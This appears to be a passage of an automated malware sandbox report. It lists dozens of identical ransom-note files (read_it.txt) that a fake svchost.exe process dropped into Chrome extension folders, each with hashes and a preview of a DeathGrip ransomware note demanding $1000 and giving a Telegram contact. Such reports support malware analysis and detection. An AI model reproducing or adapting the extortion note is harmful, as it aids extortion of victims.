                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

